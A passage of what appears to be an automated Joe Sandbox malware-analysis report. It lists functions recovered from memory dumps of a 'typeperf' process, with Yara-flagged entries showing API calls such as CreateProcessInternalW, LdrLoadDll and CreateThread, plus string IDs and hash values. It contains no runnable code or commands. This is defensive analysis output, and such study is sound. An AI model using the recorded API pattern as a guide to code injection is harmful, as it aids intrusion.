                                                                                                                        • String ID: Cso
                                                                                                                        • API String ID: 2186235152-1417854071
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,Cso,00000010,?,?,?,00000044,?,00000010,006F7343,?,?,?), ref: 00705303
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID: Cso
                                                                                                                        • API String ID: 2186235152-1417854071
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 0070524C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID: -o
                                                                                                                        • API String ID: 3298025750-420917946
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 0070524C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID: -o
                                                                                                                        • API String ID: 3298025750-420917946
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 006FE2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 006FE2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 006F3F72
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(006F1D56,?,0070399B,006F1D56,007032B7,0070399B,?,006F1D56,007032B7,00001000,?,?,00706A10), ref: 007051FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction ID: 9fdd506a88285f9c77a0d687126b27aa8a0a4cea2cb7997e98955cd383412e9f
                                                                                                                        • Opcode Fuzzy Hash: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction Fuzzy Hash: CCE06572600208BBD610EE99DC45FEB33ACEF89710F004409F908A7282DA30B9118AB8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 006F73AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 2a7d669931d6e0cb145b725e85ac90b0e02642550949f89e31e455212460c42d
                                                                                                                        • Instruction ID: be04a2090fd86309dc1e616a7842cbae63ffb16563565e98dd533410e9f738a1
                                                                                                                        • Opcode Fuzzy Hash: 2a7d669931d6e0cb145b725e85ac90b0e02642550949f89e31e455212460c42d
                                                                                                                        • Instruction Fuzzy Hash: EEE02072144B0C7BF720557CDC45FB633484748720F144650BD2CCB3C2E138F90155A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,006F182A,006F1F99,007032B7,00000000), ref: 006F71C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: df449ebfa000ae5b237b49492d0fd22eda0280e8947658d3bff59b12cabe255f
                                                                                                                        • Instruction ID: ff7086a534529e7237a642438d51a235c5f7fd244a7886c37ba596edecd9b7c1
                                                                                                                        • Opcode Fuzzy Hash: df449ebfa000ae5b237b49492d0fd22eda0280e8947658d3bff59b12cabe255f
                                                                                                                        • Instruction Fuzzy Hash: BAE02B756443087EF710E3F59C03FEE26890B44391F144078B90CEB3C3F964E0024955
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,006F182A,006F1F99,007032B7,00000000), ref: 006F71C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 780140fb360f83bb39098dc26f6a31938a35ff2fbc14cbd855bb62296a0f9501
                                                                                                                        • Instruction ID: 5c5a584d49f0b5dca9687c171e798bab07bc1a57d187a507af083515ee5f91ce
                                                                                                                        • Opcode Fuzzy Hash: 780140fb360f83bb39098dc26f6a31938a35ff2fbc14cbd855bb62296a0f9501
                                                                                                                        • Instruction Fuzzy Hash: A9D02E71640308BFF200E2F18C03FAA328D4B083A1F044028BA0CEB3C2F864F00109AA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: c1b6663d98e2b5e07814846b8e6ca7dc30cd8ddddbfe0c1f3aedfa67d6020662
                                                                                                                        • Instruction ID: f292cf21296255019f896a589b75333d1d1aa59b17bb375139c3af48e825d93f
                                                                                                                        • Opcode Fuzzy Hash: c1b6663d98e2b5e07814846b8e6ca7dc30cd8ddddbfe0c1f3aedfa67d6020662
                                                                                                                        • Instruction Fuzzy Hash: 87B09B719035C5C5EA51F7608608717794867D1701F19C471D2030741F4779D1E1E275
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1fd663ab2ce34104b3c3ce5b2833f4a00eee98f767d60d92a51b992d19381ce
                                                                                                                        • Instruction ID: f74229302ae57d0a695195075afe3f3cc7563fba292a3a0c6b2ebe86dee0d1e0
                                                                                                                        • Opcode Fuzzy Hash: f1fd663ab2ce34104b3c3ce5b2833f4a00eee98f767d60d92a51b992d19381ce
                                                                                                                        • Instruction Fuzzy Hash: 14C08C32E0A0041BD2100C0D78022B8F3A4E78B122F0421A7EC6CE3A00B10BD02E108D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 74ceeb15bf15edab9157ca495845553239b81aa06ce6e541d63c405d3439499a
                                                                                                                        • Instruction ID: b5c0a27e39ca8c1c7c28af03a6a6445616050d457b7372744b49ecc9f07a85f0
                                                                                                                        • Opcode Fuzzy Hash: 74ceeb15bf15edab9157ca495845553239b81aa06ce6e541d63c405d3439499a
                                                                                                                        • Instruction Fuzzy Hash: 3A5107B6B01216BFDB10DF98C89097EF7FCFB49200B548A6AE565E7645D334DE408BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 1b0d0f93e71f6987a4e01bfb267311063ba8035947e8f7c86778765a4b63ff9b
                                                                                                                        • Instruction ID: 558499175086e9a171364c661b26d5c12220aeddfd53f2f96ab7486b6e5ab645
                                                                                                                        • Opcode Fuzzy Hash: 1b0d0f93e71f6987a4e01bfb267311063ba8035947e8f7c86778765a4b63ff9b
                                                                                                                        • Instruction Fuzzy Hash: E45125B5A01A45AEDB20DFACD8809BFF7FDEB44200B088CB9E596D7641E770DA008760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03064655
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03064742
                                                                                                                        • ExecuteOptions, xrefs: 030646A0
                                                                                                                        • Execute=1, xrefs: 03064713
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03064787
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030646FC
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03064725
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: 1c06f721147f6e1b9ca6fb662021a84567564d38c00037484b530df96b451b29
                                                                                                                        • Instruction ID: c971ce51075edcc5ae04bd692512ba21271271aac6bd158b3b4eb746eb79083f
                                                                                                                        • Opcode Fuzzy Hash: 1c06f721147f6e1b9ca6fb662021a84567564d38c00037484b530df96b451b29
                                                                                                                        • Instruction Fuzzy Hash: B2514A35A023297AEF11EBA5DC89FEE7BADEF44B00F0804D9D505AB182D771AA458F50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction ID: 5b3d2cdae1690f7d39c7e23560bd64b669275256c4c75157712a3ea5d6ceb4cc
                                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction Fuzzy Hash: C6022775519385AFC354CF68C490AAFBBE9EFC8700F08892DF9854B264DB72E905CB42
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: e75aa486d31d11f2bd1ee8b610a90ba6cf71d3b757a749c2b2f040df98b5e3f6
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: 4D819B74E472499BDF24CF68C8917EEBBEAEF46318F1C465AD861A7391C7348841CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: fd5413ecf0c2729fef74160f1b4988d72e505c937b0b02f5393d3ed331fe5c16
                                                                                                                        • Instruction ID: 420a6602a9210bdd87059e7d4000c28f1238dd363f754f8309f4ee3c5b0a70e8
                                                                                                                        • Opcode Fuzzy Hash: fd5413ecf0c2729fef74160f1b4988d72e505c937b0b02f5393d3ed331fe5c16
                                                                                                                        • Instruction Fuzzy Hash: E0216276A01619ABDB50DFBDDC50AFEB7FCEF54640F080566E905E7200E730DA418BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 0306031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030602E7
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030602BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: a6be6f8fb42bbdace4424016368570f164b8a35ca3980753d1a8028ee4b91499
                                                                                                                        • Instruction ID: 58f45c63f27b4e7fb30a4c344175836c604f38bd5d525a8e22f4448cd8075546
                                                                                                                        • Opcode Fuzzy Hash: a6be6f8fb42bbdace4424016368570f164b8a35ca3980753d1a8028ee4b91499
                                                                                                                        • Instruction Fuzzy Hash: 73E1EE7160A7429FD725CF28C884B6AB7E4BF85324F180B6DF4A58B2E0D774D855CB42
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 03067BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03067B7F
                                                                                                                        • RTL: Resource at %p, xrefs: 03067B8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 7dc40e9d2e40b40f9360523808cf0d865d4a5d64f4430c81bb849889c9198019
                                                                                                                        • Instruction ID: ced1a7a60ef77e913dd0a51de3bb919a29490e0ea69004f1f8e4d3e1a0eff6d2
                                                                                                                        • Opcode Fuzzy Hash: 7dc40e9d2e40b40f9360523808cf0d865d4a5d64f4430c81bb849889c9198019
                                                                                                                        • Instruction Fuzzy Hash: 2C4117357027029FD764DE25CC40B6ABBE9EF88720F140A1DF95ADB680DB71E8058B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0306728C
                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 030672C1
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03067294
                                                                                                                        • RTL: Resource at %p, xrefs: 030672A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: bc3676aac9fcb620bf712bd28d8897e8c7cd1b8ebf959d8102e432dd269604fa
                                                                                                                        • Instruction ID: 9c1a2ef9094e207dc9dcaec843fe4a931d287027ce93d55fd83ebafd3104f3ef
                                                                                                                        • Opcode Fuzzy Hash: bc3676aac9fcb620bf712bd28d8897e8c7cd1b8ebf959d8102e432dd269604fa
                                                                                                                        • Instruction Fuzzy Hash: 7941E335702317ABD720DE25CC81F6AB7E5FF84B14F180A19F956AB640DB21F8468BD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: b3ab4961a655d750cdfc40d3f3c1998e5e40122954713f0e84db02e1bc3204f2
                                                                                                                        • Instruction ID: 2215313d705c729be6d371bf4eacec6bc6258931174f328640c93de5014cfd87
                                                                                                                        • Opcode Fuzzy Hash: b3ab4961a655d750cdfc40d3f3c1998e5e40122954713f0e84db02e1bc3204f2
                                                                                                                        • Instruction Fuzzy Hash: A431A777A016199FDB60DE6CDC40BEFB7FCEF45600F4545A6E849E7100EB309A448B60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
